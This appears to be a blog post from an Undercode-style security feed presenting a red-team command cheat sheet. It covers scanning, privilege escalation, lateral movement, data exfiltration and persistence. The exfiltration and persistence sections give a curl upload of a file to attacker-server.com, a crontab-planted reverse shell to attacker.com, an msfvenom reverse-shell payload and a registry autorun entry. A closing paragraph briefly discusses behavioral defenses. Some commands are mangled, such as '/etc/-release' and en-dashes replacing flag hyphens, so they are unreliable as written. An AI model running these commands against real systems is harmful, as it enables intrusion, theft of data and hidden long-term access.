Listen to this Post
Introduction:
Penetration testing and red team operations require a deep arsenal of commands and techniques to assess security postures effectively. Mastering a core set of utilities across various platforms and domains is the difference between a successful engagement and a missed opportunity. This comprehensive guide consolidates the essential commands every security professional needs in their toolkit.
Learning Objectives:
- Acquire proficiency in fundamental reconnaissance and vulnerability scanning commands.
- Understand critical techniques for privilege escalation on both Windows and Linux systems.
- Learn essential commands for lateral movement, data exfiltration, and establishing persistence.
You Should Know:
1. Network Reconnaissance & Discovery
`nmap -sS -sV -O -p- 192.168.1.0/24`
This Nmap command performs a SYN stealth scan (-sS), service version detection (-sV), OS fingerprinting (-O), and scans all ports (-p-) against an entire subnet. It’s the gold standard for initial network enumeration, providing a complete picture of active hosts and their services.
`arp-scan –interface=eth0 –localnet`
Arp-scan broadcasts ARP requests on the specified interface to discover all live hosts on the local network, often revealing systems that ignore ICMP probes.
`dig AXFR @ns1.example.com example.com`
Attempts a DNS zone transfer from the specified nameserver. If misconfigured, this can reveal all DNS records for the domain, providing critical internal network information.
2. Web Application Vulnerability Assessment
`sqlmap -u “http://test.com/page.php?id=1” –batch –risk=3 –level=5`
Automates the process of detecting and exploiting SQL injection flaws. The `–batch` flag runs non-interactively, while `–risk` and `–level` control the depth of the tests.
`gobuster dir -u http://test.com/ -w /usr/share/wordlists/dirb/common.txt -x php,html,txt`
A fast directory and file brute-forcing tool. This command checks for common directories and files with common extensions, often uncovering hidden administrative interfaces or backup files.
`nikto -h http://test.com/ -C all`
A comprehensive web server scanner that checks for outdated server software, potentially dangerous files, and other common web vulnerabilities.
3. Linux Privilege Escalation
`sudo -l`
Lists the commands the current user is allowed to run with sudo. This is the first command to run when looking for privilege escalation vectors, as it may reveal a user can run a specific command as root without a password.
`find / -perm -4000 2>/dev/null`
Searches the entire filesystem for SUID binaries. These files execute with the permissions of their owner (often root), and some can be exploited to gain elevated privileges.
`uname -a; cat /etc/-release; dpkg -l`
This series of commands gathers system information, including the kernel version, distribution details, and installed packages. This data is crucial for identifying potential kernel or software exploits.
4. Windows Privilege Escalation
`whoami /priv`
Displays the privileges assigned to the current user token. Enabled privileges like `SeImpersonatePrivilege` or `SeBackupPrivilege` can often be leveraged for elevation.
`systeminfo | findstr /B /C:”OS Name” /C:”OS Version” /C:”System Type”`
Outputs key OS information needed to research relevant kernel exploits, ensuring you use the correct exploit for the architecture and version.
`wmic service get name,displayname,pathname,startmode | findstr /i “auto” | findstr /i /v “c:\windows\\”`
Queries for services that start automatically and whose executable path is not within the default Windows directory. Unquoted service paths or writable service binaries are common escalation vectors.
5. Lateral Movement & Pivoting
`psexec.py domain/user:password@targetIP`
From the Impacket suite, this tool executes a remote command on a Windows target using SMB, often used to get a shell on a remote system if credentials are known.
`evil-winrm -i targetIP -u username -p password`
Connects to a remote Windows host using the WinRM service, which is a legitimate administrative tool that can be used for lateral movement.
`ssh -D 1080 [email protected]`
Establishes a dynamic SOCKS proxy through an SSH connection to a compromised jump host. This allows you to route your tools’ traffic through the pivot point to access internal networks.
6. Data Exfiltration & Command Control
`scp /local/path/sensitive.txt [email protected]:/remote/path/`
Securely copies (via SSH) a file from the compromised host to an attacker-controlled server. This is a straightforward method for exfiltrating data.
`python3 -m http.server 8000`
Starts a simple HTTP server on port 8000. This can be used to host tools for download on the target machine or to exfiltrate data via `curl` or `wget` POST requests.
`curl -X POST -F ‘[email protected]’ http://attacker-server.com/upload`
Uses `curl` to send a file via a POST request to a remote web server, a common method for exfiltrating data through web protocols which may be less monitored.
7. Establishing Persistence
`crontab -l > /tmp/backup_cron; echo ” /bin/bash -i >& /dev/tcp/attacker.com/4444 0>&1″ >> /tmp/backup_cron; crontab /tmp/backup_cron`
This series of commands backs up the current crontab, appends a new job that creates a reverse shell every minute, and reinstalls the modified crontab.
`msfvenom -p windows/x64/meterpreter/reverse_https LHOST=attacker.com LPORT=443 -f exe > payload.exe`
Generates a Meterpreter payload in an executable format. This payload can be deployed on the target to establish a feature-rich, persistent reverse shell.
`reg add “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v “BackupService” /t REG_SZ /d “C:\Windows\Temp\payload.exe”`
Adds a registry key that will cause the `payload.exe` to execute automatically whenever a user logs in, a classic persistence mechanism on Windows.
What Undercode Say:
- The modern red teamer’s effectiveness is directly proportional to their command-line fluency and their ability to chain these discrete techniques into a coherent attack path.
- Defensive strategies must evolve beyond signature-based detection to behavioral analysis, as many of these commands are legitimate system administration tools.
The core challenge in modern security is the dual-use nature of these powerful commands. Tools like `PsExec` and `SCP` are essential for IT administration but are also primary attack vectors. This reality necessitates a security model focused on user and entity behavior analytics (UEBA) rather than simply blocking tools. Effective blue teams must not only recognize these commands but also understand the context in which they are run—a `whoami /priv` command is normal for a sysadmin troubleshooting an issue but is a massive red flag when run by a user from the marketing department. The future of defense lies in this contextual awareness.
Prediction:
The increasing adoption of EDR (Endpoint Detection and Response) solutions and sophisticated SIEM rules will force red team methodologies to evolve. We will see a significant shift towards “living off the land” using interpreted languages like Python and PowerShell, which are harder to distinguish from legitimate activity. Furthermore, the use of AI by defensive systems to detect anomalous command sequences will lead to the development of AI-powered offensive tools that can dynamically generate “low-and-slow” attack commands designed to mimic baseline traffic, escalating the cyber arms race to a new, algorithmic level.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Jawadabdulsamad Your – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
